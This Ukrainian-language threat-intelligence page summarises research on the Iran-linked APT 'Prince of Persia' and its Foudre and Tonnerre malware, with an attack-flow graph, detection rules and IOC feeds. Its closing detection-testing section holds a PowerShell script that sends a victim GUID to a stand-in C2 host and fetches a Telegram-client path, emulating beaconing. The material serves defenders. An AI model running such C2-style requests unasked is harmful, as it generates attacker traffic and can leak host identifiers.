Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт описує пов’язане з Іраном угрупування APT під назвою Prince of Persia і простежує його прогрес протягом останнього десятиліття, з акцентом на діяльності, спостережуваній з 2023 по 2025 рік. Оператори покладаються на індивідуальні сімейства шкідливого програмного забезпечення, включаючи Foudre, Tonnerre, MaxPinner, Rugissement і Deep Freeze, для підтримки шпигунства та систематичного викрадення даних. Останні версії впроваджують алгоритми генерації доменів, управління та командування на базі Telegram і зашифровані SFX-навантаження для покращення стійкості та приховування. Мішенями є критична інфраструктура та мережі, пов’язані з дисидентами, в різних регіонах.
Дослідження
Дослідники SafeBreach стежили за операціями групи з 2019 року, збираючи нові зразки, документуючи архітектуру C2 та аналізуючи логику DGA. Вони розшифрували захищені навантаження, витягли облікові дані бота Telegram та побудували часову шкалу варіантів розгортання. Дослідження висвітлює окремі виробничі та тестові інфраструктури і деталі поведінки, пов’язаної з зараженням через Excel. Індикатори компрометації були зібрані з хешів шкідливого програмного забезпечення, доменів та URL-адрес.
Пом’якшення
Моніторьте активність DNS на предмет виявлених моделей DGA, блокуйте відомі шкідливі домени та обмежуйте або перевіряйте трафік, пов’язаний з ботами Telegram. Додайте виявлення для зазначених імен файлів шкідливого програмного забезпечення та артефактів DLL-завантажувача, а також використовуйте моніторинг DNS/секвестрацію для висвітлення обертової інфраструктури. Забезпечте дозволи списків застосунків та укріпите безпеку Office, обмежуючи макроси, щоб зменшити ймовірність початкового доступу.
Відповідь
Якщо знайдено будь-який індикатор, ізолюйте уражену систему, зберіть мінливі докази та проведіть цільову розвідку на відкладених файлах та відповідних шляхах реєстру. Блокуйте всі пов’язані домени та IP-адреси, оновіть токени бота Telegram та перевстановіть облікові дані для уражених облікових записів. Полюйте по всьому середовищу на залишки індивідуальних DLL-завантажувачів та зашифровані SFX-навантаження, щоб забезпечити повне викорінення.
“graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef tool fill:#ffe699 classDef file fill:#ccffcc classDef process fill:#ffdddd classDef operator fill:#ff9900 %% Node definitions action_initial[“<b>Дія</b> – <b>T1566.001 Сферафішинг на вкладення</b><br />Жертва отримує зловмисний вклад Excel”] class action_initial action file_excel[“<b>Файл</b> – Зловмисний Excel з макросом<br />Викидає ccupdate.tmp”] class file_excel file malware_foudre[“<b>Зловмисне ПЗ</b> – Foudre (ccupdate.tmp)<br />Зашифрований SFX вантаж”] class malware_foudre malware process_macro[“<b>Процес</b> – Виконання макросу”] class process_macro process action_execution[“<b>Дія</b> – <b>T1204.002 Виконання користувачем: Зловмисний файл</b><br />Жертва відкриває Excel”] class action_execution action action_obfuscation[“<b>Дія</b> – <b>T1027.009 Вбудовані вантажі</b><br />Вантаж зашифрований і замаскований”] class action_obfuscation action file_camDLL[“<b>Файл</b> – DLL, замаскований під відео MP4”] class file_camDLL file action_deobfuscate[“<b>Дія</b> – <b>T1140 Деобфускація/Декодування файлів</b><br />Розшифровує вантаж з жорстко закодованим паролем”] class action_deobfuscate action process_decrypt[“<b>Процес</b> – Процедура розшифровки”] class process_decrypt process action_dga[“<b>Дія</b> – <b>T1568.002 Динамічна резолюція (DGA)</b><br />Генерує домени LOS1, FTS1, u2026”] class action_dga action process_dga[“<b>Процес</b> – Алгоритм генерації доменів”] class process_dga process action_webc2[“<b>Дія</b> – <b>T1102.002 Двосторонній зв’язок через веб-сервіс</b><br />HTTP GET з GUID, версією, інформацією про користувача”] class action_webc2 action process_http[“<b>Процес</b> – HTTP запит/відповідь”] class process_http process action_telegram[“<b>Дія</b> – Використання Telegram Bot для C2”] class action_telegram action file_tga[“<b>Файл</b> – tga.adr (Клієнт Telegram bot)”] class file_tga file process_telegram[“<b>Процес</b> – Спілкується через API Telegram з використанням токена бота”] class process_telegram process action_exfil[“<b>Дія</b> – <b>T1041 Експільтрація через C2 канал</b><br />Завантаження викрадених файлів у каталоги C2”] class action_exfil action file_exfil[“<b>Файл</b> – Закодовані імена файлів, зашифрований вміст”] class file_exfil file action_data_obfusc[“<b>Дія</b> – <b>T1001 Обфускація даних</b><br />Зберігає відведені дані з закодованими іменами та шифруванням”] class action_data_obfusc action %% Connections showing flow action_initial u002du002d>|доставляє| file_excel file_excel u002du002d>|викидає| malware_foudre malware_foudre u002du002d>|виконується через| process_macro process_macro u002du002d>|призводить до| action_execution action_execution u002du002d>|ініціює| action_obfuscation action_obfuscation u002du002d>|використовує| file_camDLL action_obfuscation u002du002d>|призводить до| action_deobfuscate action_deobfuscate u002du002d>|запускає| process_decrypt process_decrypt u002du002d>|виробляє| malware_foudre malware_foudre u002du002d>|ініціює| action_dga action_dga u002du002d>|запускає| process_dga process_dga u002du002d>|розв’язує до| action_webc2 action_webc2 u002du002d>|використовує| process_http process_http u002du002d>|завантажує| file_tga file_tga u002du002d>|активує| action_telegram action_telegram u002du002d>|використовує| process_telegram process_telegram u002du002d>|експільтрує через| action_exfil action_exfil u002du002d>|зберігає як| file_exfil file_exfil u002du002d>|застосовує| action_data_obfusc “
Потік атаки
Детекції
Можливе зловживання Telegram як каналом команд та керування
Перегляд
Можливе проникнення/експільтрація даних/C2 через сторонні служби/інструменти (через проксі)
Перегляд
Підозріле управління командним і контрольним сервером незвичайним доменом верхнього рівня (TLD) DNS-запитом
Перегляд
Підозріле виконання Taskkill (через командний рядок)
Перегляд
ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 2
Перегляд
ІОС (SourceIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
ІОС (HashSha256) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом Частина 1
Перегляд
ІОС (HashMd5) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
ІОС (DestinationIP) для детекції: 18 Грудня 2025 Prince of Persia: Десятиліття активності Іранської державної APT кампанії під мікроскопом
Перегляд
Виявлення зараження Foudre v34 через файл Excel з вбудованим виконуваним файлом [Створення процесу Windows]
Перегляд
Виявлення зв’язку C2 Foudre та Tonnerre [Мережеве з’єднання Windows]
Перегляд
Виконання моделювання
Попередня умова: перевірка телеметрії та базових показників повинна бути пройденою.
Причина: Цей розділ детально описує точне виконання техніки супротивника (T1584.005), призначеної для запуску правила виявлення. Команди та розповідь МАЮТЬ конкретно відображати ідентифіковані TTP та мають на меті згенерувати саме ту телеметрію, яку очікує логіка виявлення.
-
Розповідь про атаку та команди:
Актор загрози налаштував шкідливий доменmalicious-c2.example, який хостить сервер C2 Foudre/Tonnerre. Навантаження нападника на машині жертви виконує два запити HTTP GET:- Відправляє GUID жертви на кінцевий C2 Foudre, використовуючи шлях
/1/?c=<GUID>. - Зв’язується з API Telegram через задній хід Tonnerre, використовуючи шлях
/t/tga.adr.
Обидва запити виконуються через HTTP (для спрощення журналювання проксі) і містять загальний User-Agent для змішування із звичайним трафіком. Дії генерують точні поля (
request_method=GET,urlмістять цільові підрядки), які відстежують правила Sigma. - Відправляє GUID жертви на кінцевий C2 Foudre, використовуючи шлях
-
Скрипт тестування регресії:
# ------------------------------------------------------------ # Моделювання зв’язку C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Визначте GUID жертви (в реальній інфекції це буде зчитано з реєстру) $guid = (New-Guid).Guid # 2. Визначте шкідливий хост C2 (замініть на адресу, яку ви контролюєте для тестування) $c2Host = "http://malicious-c2.example" # 3. Відправити GUID на кінцевий C2 Foudre $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Відправка GUID на Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Зв’язатися з API Telegram через задній хід Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Зв’язок з кінцевою точкою API Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Моделювання завершено. Перевірте SIEM на наявність тривог."Скрипт автономний; його запуск на Windows хості, що маршрутизує трафік через налаштований проксі, створить два записи журналу, які відповідають умовам правила Sigma
url|containsумовам. -
Команди очищення:
# Видалити будь-які тимчасові мережеві з'єднання (актуально тільки якщо проксі створює постійні сесії) # Тут ми просто очищаємо кеш DNS, щоб уникнути залишкового розв’язання шкідливого хоста. ipconfig /flushdns Write-Host "[*] Очищення завершено."